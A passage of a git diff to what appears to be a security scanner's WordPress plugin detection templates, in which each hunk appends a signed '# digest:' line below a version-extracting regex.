4b0a00483046022100b5dc275f15ed64f678fc98ff6e13fad13eccc2129c2464c8fe0157d7d64985bb022100e222d690242f8cfada454228f83f46ea959a714d028e9f4632acf589712740f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..a00f42cb95 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200becd555fa1d887c91d4cdc87788815d1f6ca6e027431c3c3edfa476dedb0d700221008aed395fe4256b454108a1a08a8a297d5ee8382f98f7618595283cf96ac7a969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..c2837cacfa 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8464949204038a7abeb64ca8edb96889b3c9992cfbcd99e76a8e2878a55317d022002494af32b1320f5052dcf61b140282f7bf676a1ea665b213ec8f5175c6476b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..13cadb4c16 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220748a229df8ed7d00644cf3e5b93d48db39e6de1bb6a76eac81990d6ad7eef4b702207d3f6d051ae1180ae75f9fb993ba0e671b2e942e6bd1015a6c0b49739f0d8278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..6410c7b1ab 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a798ec1325a96dc706930e7ce59f6415bfad4c79c69cb6f26734436d4a5bfe45022100eddbc76d4b2baf1858aa0b55091dad3987788b8d20a86b37355ffa2ddd2b17f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..e0a70e17b1 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ed5e52acb70d5b87ed8100e6ebbb057251eb5cf7bb9cba44e4deb93878f975ee022100f68aa8d6158899b4f577aab5c6f4c45b8fe3152289c8ca5c5d0bc0adbae3211b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..6642af2205 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba988a22f8b5a8a31f19141e405815ced66910ff41e1d00c344b0d8288432a2f022100821f34a4d97b4c8cd07839836eb8f89593a23dbf7519721f2cded3f91c469467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..1a575a8531 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a44dc7d5cde151e89df9ac988ead067a2de5672d47972db174c5ded8f5baf55022070b1ae0dc1c12797e7e1188165a8f0fe4380615d107cde07f32ada9da20a4000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..1928e7babc 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220773dcd08ee6401394047cbe1cf724a1c5090ff8d45b16899e57b9931b0674684022008be6c1cdf74305bb63b88774cc82ab1e25eb64d2dbe4e6a509464db450db574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..e1e24f3e73 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022074b90779e6e245cef937ac464429b9350ac2c43d4e32427637e9615fc5b7564e02200eac3f2f6a19df322a1d319b48ceb61cfaf3d3f8160aa923ea0ce49bb156fa97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..e39ea62314 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bf9fdf5f8051d1d032ff3390b03a8a609bef028bb1a8000d7df7d27735fb354022100bec8503bccf84ca1803999c6d43b209ad243e835ceb48ca1c67a1f44ee5b3267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..b7703f727c 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e306eb9aa4d29a82f42e35b6dd3d68448e5b02e2efba0a00593018a0d33eeeca022100a8d86c5423917b72eae5a1d85216248bae633a24685614dc10e527c81435b91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..5dd35b496a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200247221a8223479a99286a8d6983a0e53669345843062f568a1abe9863b5200b022100f4a113d88c087c72abbed0641a58ed3ad239fd3e6b484c4aa2187865abf66050:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..0d6c91afcf 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e7362bdefc0d1c6d93b913f633465fdc04fbbdaba0396139760e1aaf8b0b77be0221009caec972100ad0fdd0b197a7ee959faea7c02ec8326f0fbdbb97b1e372ea5ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..6c99bfa950 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a74fc7affa47a317272f5b096f3e7db168205acf55c614749901e41f8a2e80030220203fcab5bdfc0a0967251ed37d564060842bb9484b0e636fc15431002b4db7b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..bd0ec913b4 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f69db86fd4c4eb42f62653289828e1fc54dc325256994705c01334aa560212df022100da95b40c415cec665ac3de7117c428ec2bf6e8046f86db821ca6f8eef3bbfe50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..240f62ddd7 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd64be95617a82b5544f5a5d19e33fd9c56cfa6307ba24a7d88437bd4f5e5219022100846c53f5d4a588d28649ef4430e898e72f01fd021d89380864890e906ff7ef5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..3ceeb74945 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008bc2be2fa70dc53c166d7a0437150d8e8296b3bd7e4fab50543938a5f84c4206022100a2b10e03076ab4ef61d64612987dcc8d189f0dd023bdd8a0ef9f6aece9364f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..9c8f656be8 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f7e2f0f4332268e25e2c2a78d15c5c57359d36f210221134cf013fec4d480340221008ffdd1f6b78248f4f6d4304f0227ecd70ba20484189834686ea24279eece014b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..61da87b22d 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef28ba14081117cd8bf372df19668b1b788cb64dd8d8f5fb17fc4a47d5ee026f0220603625d3d6d3b1983eb015117009881b9c7c9984e619a1fe5603d8388695ff5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..6f92e874e6 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b9dd75cd6acf1d20b3c255215d98d8435b35f04192a41fdfec9d4b9f0f417327022019fceae3d82cdc379e3253963556a22ab76a5ed71c5added070e7b73e53cbf2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..ef5aa08fe8 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e71f8402022be307e5da3239b1626584effdf4ea8849d2b5795332420bbaa2ea02205b6b82112a3f6c1913a829513b5da26f44271754a6e1eab98ef1e56112a73c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..158c06c37d 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2464873976af7df3bf00122c414c00a24aeaa11197a5b152b1592d74bccfd1702202cf3b58a5770f569513bbcc7aa98364d3c62534787e8cf20e6f2de8162e4b93b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..0191e39b49 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022035581b839aabfd7754c2074cb2d50079b06a72fd4f05c3e3cf0474d99e8232f0022100ac8c646cc421bc52029259f05b8a334e165359ede45027838195bbfb65dfbe79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..1d82d1cfb0 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009933433c67145601b9b66ffeab4cdd8fa333b304a2844692a76d43c21a08d45502207c6ff2a2e0ae1abb1fea74efa403c5303cdba01811032f6876fcbc66166d48de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..78c902cfd0 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202664a6dcfe15b6f6edab7d5db1de55e91f26e17812219327441bf32472c2bb8502203b48fcd531dcf0a7dafb74628327211370b7b3cece76e152e368899014eb633f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..d069c96e9a 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008389d8bcb95a7188cdd47168f8b2f2eeea64d036e40a519b185fc655f2d2bce1022100d8ed4af5e418ff021231ee3295ea41accea60280cdf28672ab24fcb817be031c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..ea03b4820a 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210081469799ca9b4c5a61e4c6259fdac1e1348d08686d828a8012f530f6be813e7002205f1bd8b49545107f85912e5c2b09555526b5b13a73b17fd48e58472fce208955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..66dc337e1b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b09ae3e017ff1ea69557e0218f1931e824f26dea54ca02e4c19113b967eb3e5c022100d89b69434a0d0fb8788748b1c985124d01a67acb2486660465bdf6ffb231c097:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..9af7860b60 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008dbdd6e698d6dcc1e55e70318122a51f38ef74ad6608493def274e668425aa4b02210080ea3158c1f85ebd17a90e05318b798fbdd8e1c7c38b2cdbd12a2a052be0f538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..2aee720c9f 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026249889f24be8bcedb9201227ba222d6912545356bdd367b0993085ed3be5fc022007655a3ec4e444833c2a5ebf2206ab53b2136130e0b43eedc956681e60b02ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..461b7f4f31 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e90c0daabbc40a1d5cf3b39990642e58fa34b1a4a874cc911b5fcefb1edc69df0220490e72b7853f7b54e57652a9b2c366a3eaa6b2e643c71e741d506aec60c83949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..271eeaa9d2 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203001b4d3370cb4347659cf40064da4ec3faad4503d888d1b93ed7e92ba680c5202206e63b8928799481ebbd322e116e99e4acff644a71cf3db1df76fdb78b2ce3231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..c8bae41ae5 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220578b3c194ba65d3420a8f0340c187c57fde8a3ac969617c92e449acd3c66bd6d022100b658bf1ae0aee11697652649ba047911214c36ee65f0263caadfdd90654c2e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..4647f12ec8 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a297e0ed50269f7cbb3ce25671f666c30ca099aa77314066433fde64c0df89af02200a4b2909c7f16ccd74ca10c3b547f47b6a7f876975218330d86367a51bd7060b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..29cb731ac1 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d943f3b98200e874b8f57badf86db623bc390e06211d6ba527a9bcc8626817c0022100c6750a0f488d47c48ea393f79240c93eae92e457736deffc6e8d3823a07b1873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..e6164174d0 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f913afff9b1296168076c153cfefa05dfdb376150b2c255b3832413b6a4c7d9a022100deb95cf333db71e531d78a92379e84e28295055f35b400c37d8de9820a273f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..81977e1652 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e3fd29cbd7515c09448e03fac7ae978c4d460f4a9f6d48b8f10b32e61944fc002210093146f821ce4149a51c0a1649ebea364897e6537be07c9eefbf5ca55310b15e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..01f6ee06a9 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2587cd88ed55acbe451b7487a7dc57f665688cd023ed18618327329078b4a78022100c9b2a6b8c9ceca3d88f84ce8d9e81fa46e38eea244e09df6b1b170d1ad1722eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..80b7a22582 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017a72b878a05f6029aa82ad653a0470bb536042b0aee5c0da04db6372de9c0b7022100b6cad2ee5f8236bf5256b8e09a84a182d532ef0f5c474f660008471311f29751:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..15c3fc6017 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205e21ba9fef89995378dea9ec2175f3140bf267cbdc1cfec8b2085ed963c9df3602203b87029aafa835cb015e0c2c5088d36303f7b5ea8652bab31340ebfedda61316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..c0f7ffb779 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220152ca6b2acb90a13f8cb3842f6adadc6639cfde8582b06e909a7747300aa56a702203f42ab9271b47eeb7ed9ce1bd8f147b32a8eaeeb0dd5b5c0405325ef09875ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..f04ae9702e 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ff395674645a466f3fc43380b156f974cc585c284364352889fcf19edafce79022029c7bc6a2d02fe5d16bf9fcbbdbc1908c49a53059bf577b920395d599682f53b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..d2d4183e6e 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203753c7ea03405725e47a9ec8b5ff966c2c05b95b32a73931f395bd37fcf399ec022100f843fe32971d4ef86d93036a91dbd8075e6c0f4a1ce627b9f1d1dec8b14cb8ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..6e1e1ae72f 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e6a07616d10a70185e99e650d2a69c4244163c721cd35c3afdc5fc36eb165a0c02206e860d870664530ce15e84a4cf2e6eb826a40f45836d96a03bf04569b8f02505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..fce2200c91 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008ccd1e042cd5daa902efd212f079dc56d50de10d10c1789c88c4b718852e439902203d6685e6c5f7572cdb9a62e566313d6688f151cce6ce7cd6192ac8d10ddce7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..ae08e590f5 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022042e8bb9a31ef2a4692a65acf0086dc9964ac3e77a5c9c27c9550f7864f0de12d0220225f3b82b29575961cc63da6abbbb91c7b9d8bb711a1bd1baa22a04f5e5ea7e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..5abdc118bf 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206898a583c9fa41df15935e386492d30942c339b49f18fd5b564c880b6e7746e602210096da35f2a6b4d902b7891bd53377f72fb05fca8e3979e847b1a1ac8e88868704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..51e68b78ad 100644 --- 